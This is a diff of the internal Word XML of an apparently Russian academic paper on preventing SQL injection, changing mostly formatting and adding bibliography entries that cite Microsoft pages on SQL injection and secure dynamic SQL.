           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b w:val="0"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> оператора</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
-      <w:bookmarkEnd w:id="5"/>
-    </w:p>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:jc w:val="both"/>
@@ -5866,38 +5836,12 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:pStyle w:val="1"/>
         <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b w:val="0"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -5907,6 +5851,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -5916,6 +5861,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -9942,36 +9888,12 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:autoSpaceDE w:val="0"/>
-        <w:autoSpaceDN w:val="0"/>
-        <w:adjustRightInd w:val="0"/>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="1"/>
+        <w:jc w:val="center"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b w:val="0"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -9981,6 +9903,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -9991,6 +9914,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
@@ -10001,6 +9925,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
@@ -13021,6 +12946,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -13695,8 +13621,12 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="10" w:name="_Toc420429534"/>
@@ -13704,6 +13634,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t>Предотвращение sql-инъекций</w:t>
@@ -15188,6 +15121,7 @@
           <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="16" w:name="_Toc420429537"/>
@@ -16808,13 +16742,12 @@
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="20" w:name="_Toc326105875"/>
-      <w:bookmarkStart w:id="21" w:name="_Toc418778187"/>
-      <w:bookmarkStart w:id="22" w:name="_Toc420429539"/>
-      <w:bookmarkStart w:id="23" w:name="_Toc420429739"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="20" w:name="_Toc420429539"/>
+      <w:bookmarkStart w:id="21" w:name="_Toc420429739"/>
+      <w:bookmarkStart w:id="22" w:name="_Toc326105875"/>
+      <w:bookmarkStart w:id="23" w:name="_Toc418778187"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -16825,190 +16758,167 @@
         <w:lastRenderedPageBreak/>
         <w:t>Заключение</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="22"/>
-      <w:bookmarkEnd w:id="23"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
+      <w:bookmarkEnd w:id="20"/>
+      <w:bookmarkEnd w:id="21"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -17025,8 +16935,8 @@
         </w:rPr>
       </w:pPr>
     </w:p>
-    <w:bookmarkEnd w:id="20"/>
-    <w:bookmarkEnd w:id="21"/>
+    <w:bookmarkEnd w:id="22"/>
+    <w:bookmarkEnd w:id="23"/>
     <w:p>
       <w:pPr>
         <w:rPr>
@@ -17093,228 +17003,1320 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Атака</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SQL Injection: https://technet.microsoft.com/. -2014. -URL: https://technet.microsoft.com/ru-ru/library/ms161953(v=sql.105).aspx</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Написание защищенного динамического SQL-кода в SQL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (ADO.NET) : https://msdn.microsoft.com/ru-ru/. -2010. -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>URL</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:  https://msdn.microsoft.com/ru-ru/library/vstudio/bb669091(v=vs.100).aspx</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="34"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Противодействие атакам, использующим </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
